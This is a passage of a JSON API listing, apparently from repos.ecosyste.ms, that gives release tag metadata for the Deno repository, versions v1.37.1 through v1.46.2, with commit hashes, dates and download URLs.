l":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":